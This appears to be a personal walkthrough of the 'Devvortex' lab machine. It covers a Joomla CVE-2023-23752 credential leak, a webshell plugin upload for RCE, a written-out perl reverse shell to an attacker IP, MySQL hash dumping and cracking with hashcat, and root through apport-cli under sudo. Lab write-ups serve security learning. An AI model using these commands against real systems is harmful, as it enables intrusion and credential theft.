DevVortex - Hacking Write-ups

![[Devvortex.png]] Devvortex was an easy box that starts with an exposed website on port 80. After enumerating for subdomains the attacker comes across a hidden development subdomain that has an exposed admin console that is vulnerable to RCE. The RCE led to a shell as www-data which then led to a shell as a user, then to root through sudo misconfiguration. With all these machines I typically start with a canned nmap scan covering all the bases and export it to a file in case I need it later ``` nmap -sC -sV -p- --min-rate 1000 10.129.110.247 ``` ![[nmap-scan.png]] Ports 22 and 80 are the only open ports. There is a redirect to http://devvortex.htb so Ill go ahead and update my hosts file. ![[hostsFileDev.png]] navigating to the page on port 80 displayed a landing page to some kind of website design company called devvortex. ![[initial-port-80.png]] I did some very extensive enumeration and came up with nothing interesting. ![[gobusterDev.png]] I decided to check for subdomains which is something I always forget to do. I checked using ffuf ``` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb ``` Wait for the junk, then eliminate it. ``` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154 ``` ![[found-subdomain.png]] Fantastic, I added the new entry to my hosts file and began some recon. ![[dev-devvortex-page.png]] I looked around the html pages and found nothing interesting. Mostly boilerplate. Started GoBuster to look for something interesting and discovered 'administrator' ![[gobuster-found-administrator.png]] I immediately navigated to the administrator page and was greeted with a joomla! admin login page. I tried some basic default creds and didnt get anywhere. ![[admin-console.png]] I wanted to try and find the version to look for any low hanging fruit. According to google, joomla versions can be found here ``` http://dev.devvortex.htb/administrator/manifests/files/joomla.xml ``` I was happy to see that this was publicaly accessible. And I got the version 4.2.6 ![[version xml.png]] And according to google, 4.2.6 is associated with CVE-2023-23752. I found an almost tailored POC [here](https://vulncheck.com/blog/joomla-for-rce). CVE-2023-23752 to Code Execution #1. The article mentions that I can expose database credentials by running this. ``` curl -v http://dev.devvortex .htb/api/index.php/v1/config/application?public=true ``` ![[credentials-from-exploit 1.png]] And sure enough, I was presented with creds. "user" : "lewis" "password":"P4ntherg0t1n5r3c0n##" I went ahead and attempted to login as the user lewis and logged right in! ![[logged-in-as-lewis.png]] According to the article, we can either edit an existing template for RCE or upload our own. I tried modifying Cassiopeia but didn't have permissions, but I do have permissions to upload my own. so I will upload my own malicous one from [here](https://github.com/p0dalirius/Joomla-webshell-plugin) ``` git clone https://github.com/p0dalirius/Joomla-webshell-plugin.git make ``` the malicious zip will be located in dist. you can upload the file here ![[upload.png]] ``` http://dev.devvortex.htb/administrator/index.php?option=com_installer&view=install curl -X POST 'http://dev.devvortex.htb/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id" ``` ![[proof of RCE.png]] Very straight forward! I have RCE, Now I want to turn this into a shell. Once I moved everything to the repeater I starting testing a good command for a reverese shell and settled on perl ``` perl -e 'use Socket;$i="10.10.14.3";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};' ``` ![[moved_to_repeater.png]] Ill paste this into my Burpe suit repeater and url encode key characters, Sorry I don't have a screen shot of that. Ill set a Netcat listener. ``` nc -lvnp 443 ``` ![[set_up_listener.png]] Then click send and I have a shell as www-data ![[proof_www_data.png]] I upgraded my shell using python ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` I couldn't get my shell any better but it didn't matter because I didn't have much left to do. My immediate reaction is to try ``` sudo -l ``` but nothing showed up, no surprise. It's www-data. I checked the home directory and saw another user named logan. This matched what I saw in /etc/passwd I googled where Joomla keeps its mysql credentials since joomla requires a database backend and it returned that its located in configuration.php in the root of the website files. ``` cat /var/www/dev.devvortex.htb/configuration.php ``` ![[configuration-php.png]] It was now I realized that I already had the mysql credentials. So I locally logged into mysql ``` mysql -u lewis -p password: P4ntherg0t1n5r3c0n## show databases; use joomla show tables select * from sd4fg_users ``` ![[logan-mysql-creds.png]] found logan creds This where I learned a valuable lesson, Never try just one cracker. I immediately pasted the hash into Crackstation and it returned nothing. So I spent the next several hours looking around for anything. I tried kernel exploits like PwnKit, I tried using the credentials I had everywhere and nothing came up. I finnally returned to the hash since it had to be a my way forward. I loaded the hash into a file. ``` echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash hashcat hash ``` hashcat returned that this was a blowfish encryption and that i could try to crack using 3200, so thats what i did ``` hashcat hash -m 3200 --wordlist /usr/share/wordlists/rockyou.txt ``` After a few minutes ( I'm traveling so I only had my slow laptop ) it cracked! ``` $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho ``` I Immediately tried these credentials for logan ``` ssh [email protected] password: tequieromucho ``` I was very happy to see I had a shell with logan using ssh. ![[shell_as_logan.png]] grab the user flag! ![[userflag.png]] My very first check is to see if logan has any sudo permissions. ``` sudo -l ``` And he does! ``` sudo /usr/bin/apport-cli ``` GTFObins had nothing on apport-cli. but google showed an easy exploit [here](https://github.com/diego-tella/CVE-2023-1326-PoC) So I tried it exactly as mentioned. ``` sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash press V (view report) !/bin/bash ``` but got this ![[apport-cli-fail.png]] I had sudo rights for JUST apport-cli, so I played around with it until I could view a report. ``` sudo /usr/bin/apport-cli 4 v !/bin/bash ``` ![[got-root.png]] and I had root! And grabbed the root flag! ![[root-flag 1.png]] I enjoyed this machine. It was very straight forward and didnt pose any significant challenge. But I enjoyed it either way. Thanks for reading!